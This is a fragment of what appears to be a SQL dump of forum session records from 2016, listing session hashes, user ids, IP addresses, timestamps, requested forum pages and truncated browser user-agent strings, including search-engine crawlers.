('85eabc40f4e918a08535a006d8087236', 0, '172.68.11.200', '3b6dbe0faa0839f404dc64f20c7b8c8a', 1465482283, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7550e7e551a1ed099e4a47a60b949f3f', 0, '172.246.28.2', 'b672282a03c1dbd6062c6aecafb4f848', 1465484082, '/showthread.php?p=3045', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('703d1afd8d2f23911c773a98aa073ad2', 0, '77.97.247.140', '6ae289c5136a2ac6dcbe7c93a4da17df', 1465485863, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ad045ea19ed5c9455b631dc3b6c6cdb5', 0, '31.24.221.3', 'fe44d33ace1005c3f5984de839ca5cb7', 1465486521, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea3a654cff33202c71bbba369fef2378', 0, '109.201.148.240', 'f39721012eaad86b576378df8a8dcb2c', 1465488147, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5a775c688340c23f1e86eeda46abee3e', 0, '90.62.187.34', '08dc3ea726cfb96bde18859dcf5a38d3', 1465570532, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f5d65d3652a0a888f9f3ae131494839f', 0, '5.175.176.244', '63704ac1c7a1683962e32b7073903d3d', 1465490767, '/index.php', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca6a9bc316e049acbf87ff025a23ea5c', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465493362, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('faf93106b175d8049415683c57dd882c', 0, '172.68.11.201', '069ba3350f7f8777a185686ae9023f21', 1465493953, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('398283a3fe4a56e30926bd2fa0a7d1a1', 0, '149.202.58.177', 'c84b994f89cf3f8bbcd37b84e843a346', 1467143137, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c27c3007fb48d2e63671f801024168a3', 384, '37.48.85.25', 'eee3a067d1493a7a7971f5db9ba0d1c8', 1465496546, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('a9673835a31cfab08a57af075732b6e3', 0, '5.155.187.73', '747a0497dfdc7d2cbfb243e0284eb298', 1465513740, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2c583c40c8112fdef80ca0735dca765d', 0, '41.218.249.79', '1ebb20a45b4a223c054b0ac81678ffe6', 1465501983, '/register.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('afe12f016aee2a0f17fc984f98bedcbb', 0, '66.249.75.248', '37a60411c341250cf0113f4eba911963', 1468241102, '/showthread.php?p=2258', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9b449d338b697d23c73d61c2bf8486d7', 0, '66.249.75.136', '37a60411c341250cf0113f4eba911963', 1465878662, '/archive/index.php/t-1151.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('80095af00e0cb9fd34d1122b40dc623b', 0, '151.238.11.72', 'ef038880d4d0881b1ef4671dce91243c', 1465505220, '/index.php', 'Mozilla/5.0 (Windows NT 5.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('61aef1fdb6b08f4ce5af349fe066a282', 0, '66.249.75.240', '37a60411c341250cf0113f4eba911963', 1468241293, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c472a929ac95b17e4d66d4290f05744c', 0, '66.249.66.136', 'b4343dffbdc847519606d6eb72cdaefd', 1468731228, '/member.php?u=175', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('18ccad224bcc4a23994c80939f4dc94e', 0, '52.71.29.69', '487fc8f919fead2a34a927c49a188d64', 1466999824, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fee56c2943e80c86d6955dcec845c34d', 0, '72.239.173.224', 'a5db5e6b79aac2b2409ffd0ca346c7bc', 1465509900, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a73fd926f9e7b54eab8753fa09ed581d', 0, '66.249.75.248', '8c2a58ed4130be298d50116da95b8cf5', 1465596694, '/archive/index.php/t-2487.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('6dba5aac8e6abd83c83611894efc2c0c', 0, '86.77.86.229', 'cb1df4fc18ef17a10f6e6338db3ad27c', 1465512267, '/showthread.php?p=3045', 'Mozilla/5.0 (Linux; Android 5.0.1; GT-I9505 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b737d9e380047224be461bf58db1fe61', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465515350, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7493f051b1d3c6b6fc7af680cfa69c53', 0, '151.28.142.238', '52c8671e73df0a3299e9107364e5b990', 1465517453, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('33f94de699251f4835a4169d18af2e29', 0, '96.244.45.246', '74fb7fae91c0c4067faf54b0efe86477', 1465518125, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fede65d462431f39dac7590f61815e83', 0, '78.191.177.150', '70439dfdf4c57efefb27e37623b1e861', 1465530291, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9aefea2218d11bdc96f9a2d046a690ad', 0, '100.35.107.99', 'ffd5d00954221f3bb04dfb85e7f0bcf1', 1465533747, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9aac4b4fff2be594b1f1643c09dfcf03', 0, '172.68.11.242', '75ce96d3f79aae515ba082cbe395def2', 1465535734, '/showthread.php?p=3005', 'Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d3ec2c1e08f024d0fc4fea2f64f3c359', 0, '66.249.75.232', '37a60411c341250cf0113f4eba911963', 1465882762, '/archive/index.php/t-1699.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('ad79b0b62dacbee672619ceb4d9121f2', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465537905, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('88aaf5b4afcdefc2eadbaef42a9238dd', 0, '198.8.80.214', '65fbd3f4121efe3fbf3318117910bb95', 1465542571, '/index.php?', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('39fd426d15946f4170b6647a23a806fd', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465544700, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b8c8e509926d947dcce1f1ba60d0526c', 0, '43.228.156.4', 'd73d00babb625fe3a2217b48c7254521', 1465544984, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('202f42461b1e7a885e58bb535702a86a', 0, '85.105.178.242', '5db609e9235e4ee42140e58be1b8c69a', 1469540795, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1b12dad83dcb76aa12bd96dc33532db', 0, '66.249.69.166', '3df8aba2b3eca121fe57fe850b21954c', 1465546242, '/showthread.php?p=2240', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('805d27ea9626b23e8c648667c62e5082', 0, '133.242.133.62', '3785dab69cbae8db225a442ff1b48e74', 1465548411, '/showthread.php?p=3048', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('54e496f661cc0f28a474c7afaf25c804', 0, '66.249.66.176', '12f36206c9448b3daf21459226f35f3f', 1472243957, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('97d031a2cb542ad34b0228c8d075167b', 0, '176.10.250.15', 'c7b4d3fbe335d9fd86ea08235b6b4d33', 1465549277, '/member.php?u=297', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8db136a84c617c1c59bd47dc1e07d89b', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465550736, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('bdeb3846fe285390523fbfe073f48c2c', 0, '37.201.228.13', '1786826c0e987b915d54b14ac3076676', 1465552454, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('225f1946a8b06ec2edfedd0429a3c769', 0, '217.73.42.10', 'd19ce0ddb2b46716594138cc314633bd', 1465553098, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9a7aecae33c943089df1337412206a91', 0, '172.68.10.197', '136d055a37c014a513a351e252f9b7ef', 1468840166, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2550.2 Iron/4', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b95aeb25820256a97d408a59920793e', 0, '66.249.75.128', '37a60411c341250cf0113f4eba911963', 1465882395, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3eaaf1c19a3016e01b851231c27b86bc', 0, '91.192.75.17', '7069f29a7397ad7f335420c5c5bfc5b0', 1465555619, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2811.0 Safari', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e5fc4c846e6de825807b7cb528c6eaeb', 0, '188.77.190.254', '866529c0d535362fc530d950f8e58f4f', 1465556417, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a6f8b1839c55e247b766bc3563ac60a', 0, '172.68.10.240', '74f7fc89e5f582929c519f0a535a9aa0', 1465556601, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eed413ab31fa01a45d9a973497b40af6', 0, '172.68.10.240', '47c7e244bc5e4d8ebec4047c7efb8a4d', 1465556694, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c054310a4cfde7aea30b710b93a4072e', 0, '104.245.99.52', 'b59b5262354250543664ebf81f14914f', 1465558356, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('becb71e3808d012a804805a290edf256', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465560824, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b363cad3aaa3a3d892571d6cad2ca254', 0, '90.153.197.155', '7d2734254129dfd5d629e2d07b2c0132', 1465564204, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 YaBr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('50544a2b2347f90b403a0fb36ffa7608', 0, '92.201.62.221', '521f0d10f6d576a65beddb68bdffd349', 1465567884, '/index.php/favicon.ico', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c97480699c87e11778d7355abb95d0ff', 0, '213.174.12.156', '28c2f85066c7dc67d767ab54dd6ebb21', 1465568182, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('193c6ad59485c25e22a38588d0ab178c', 0, '172.68.11.249', '10944adac8e6e425ea4f53c0c122085a', 1465568339, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('64478c75c531f0e06abfa9f69bc47718', 0, '37.9.57.69', '8abb659b3992e3d87a6dc8759b291461', 1465569136, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0767fe0ea46a8759d44c92298f0b1dec', 0, '109.159.29.124', '4c32bb68ab65239ad2962bc490bca910', 1465570092, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('92ad4a54c2f83843310bf8b392eeaf85', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465570676, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('3480a14e1a140d83d6320920271f3153', 0, '46.251.113.146', '7e4ec62a63a4dc60a1427d986182c569', 1465665681, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a67a411a25258db56d38d47ddd1d5f49', 0, '157.55.39.204', '23f3103f44bc3badcba53554e5e4cb6d', 1465572970, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('07021fec76ea331052d29bc14949c377', 0, '31.6.12.241', 'd4a63f7240bbb287df2c678bf84af218', 1465573372, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('50618d2d18492b36e650f56059879ff7', 0, '141.105.4.150', '2142cdffc4e8db8c614e8a6b72758800', 1465574603, '/register.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('41ab61339bacc5b3cf601ed8f4ebb211', 0, '213.129.86.107', 'fbf7bd60fd3babfcfc0188d4284192e8', 1469627990, '/showthread.php?t=2404', 'Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('91aecc08ae55359dbb6a19f7751dfb6f', 343, '198.8.80.217', '3f26ca99fed6ae56b067a850651067b7', 1465579742, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('9db2ce1ef289449c8d0c84b413004754', 0, '172.68.25.20', 'c292b3173eb8a36a586dee9fcaa57173', 1465583637, '/search.php?do=getnew', 'Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.8.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ae932230f9fb4a58f3a3b7039eba0f2c', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465584573, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c49e65ca3292eebb925926767ccd5856', 0, '37.48.113.81', '57f124fb67d6ac46d530fe0aa4eca344', 1465587839, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.235', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e70dd27b9030e1331c03f7fb6b254dd', 0, '212.83.40.239', 'b2c2038e6b2d1c74a1d121228cef9c36', 1465588900, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e69159c2fefc4891aff2c21bf9b6228', 0, '205.234.237.186', 'a9a501deb66c224ed0d2eab625f634ae', 1465589054, '/showthread.php?p=2995', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('43fabadc32e63885ae4b831ba6f54a94', 0, '2a02:587:3112:a', '81a5fbe76dd4b6afdbd4b7d72c1bc33c', 1465589523, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b416ec968b431cca3c1ebb8dc5c20153', 0, '72.185.164.223', '16c4908a223a7430915dae3dafa2107f', 1465590313, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('045bdbee518d949f4a07efb63ae3c038', 0, '78.56.172.177', 'f9b1c883238a21563a3f8d1d8b56cf0d', 1465591328, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1fc0213a01a82d0adca3cc309f87f92', 0, '172.68.10.247', '2139ba717890324600a187f161206f4f', 1465593657, '/showthread.php?p=2975', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a47c42a09ef449be2a703ae8dc838167', 0, '128.68.5.235', '723b81d31cda0e4931826ae216ac235b', 1465593659, '/member.php?find=lastposter&t=2234', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 YaBro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5fdd0441d610f08bcf28d901ddcff8b7', 0, '95.27.32.44', 'b182aaa7b4c5f632626c4e96ce2fa1bf', 1465593659, '/sendmessage.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef52756b0c1f479c446dabfc4ccb6095', 0, '2a02:8070:518e:', 'b99b302cb960139bb9d7ebc4d10edb22', 1465593713, '/register.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3464350f61f8f248f663188c310f97e4', 0, '66.249.75.128', '8c2a58ed4130be298d50116da95b8cf5', 1465923772, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e35ca551d292a8fb8823c98f9cfdedf', 0, '172.68.11.237', 'dfdaccef018acb5d4fe13a24f953e942', 1465597671, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('507bde1cb322f168b213d50e462c2918', 0, '66.249.75.240', '8c2a58ed4130be298d50116da95b8cf5', 1465852457, '/showthread.php?p=2795', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('eab937e9ee0694eadbe1ac6ddf016580', 0, '24.114.92.40', 'f52d9ff95d8203fd1f0871e8115fb5fd', 1465599743, '/memberlist.php?', 'Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ffed967df72332251563337320c09dc4', 0, '40.77.167.91', 'c5490a5a8e1813ac25cf9e19091dcb85', 1473156824, '/archive/index.php/f-37.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('5d0e6a9e6f26b7cf1a07cdc2b502c782', 0, '89.92.120.63', '721c6058e80dcb6b14b91eaada1a0c4d', 1465604458, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('11a4dd48a5c5ea887e615ebef8f8c06b', 0, '199.59.148.211', '4b4ee0203c0f40a032f0bff548803b25', 1475260102, '/showthread.php?p=2959', 'Twitterbot/1.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d160d5413cb2c38db8a6750123158785', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465608624, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('4cf062302af35d0e63c59513e0c7ee0b', 0, '172.68.10.251', '6434d408c411ec04415443376d45db73', 1465611914, '/member.php?find=lastposter&t=2234', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 YaBro', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2adfd4f0a2224ba576eb2d5ee2c44497', 0, '172.68.10.200', 'd74ab86c47127a5633a6439afbf649ac', 1465612058, '/sendmessage.php', 'Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.14', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6eac4e781290885559c32d2efa1b6728', 0, '172.68.10.201', 'afef90a2a683f19a27a7904d8ade9d6e', 1465612580, '/showthread.php?p=2975', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f1f22722e64d8d3ecc76c29b380a2ca6', 0, '172.68.11.246', '8cbf7ef85ce0f6adb3af493c0cb684d7', 1465613903, '/showthread.php?t=2369', 'Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1648b6fd66c9a2dd6c81819a5fe111c', 0, '103.252.200.42', '5bdd2fbf91a9705e08da6fc88d1fa664', 1465660438, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('710201c7ef7dfdacec090cfd7a8d0285', 0, '151.237.181.13', '70bbb6952e264dc3469dda08e028c852', 1465617690, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1d114e11c71c946c51c6b991cc7055db', 0, '59.153.234.248', '65fc96634250cc99db97a6ef84bf7e46', 1465626415, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_02 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versi', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('14be2d06d2b807baceca7e784d18af4e', 0, '109.103.60.27', 'bb6cb3d00ea90eecdd8d2cb689bd0046', 1465627069, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3ae53091e71e174f820a335ae9707c67', 0, '123.17.41.8', 'e749cf5b407a4087ea2f0a22401b9949', 1465627485, '/index.php', 'SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('46b88b436cee6b76813c3b12e5a2eeea', 0, '123.17.41.8', '5a80d5ce5bf25c5952164a50bd4a250f', 1465628545, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
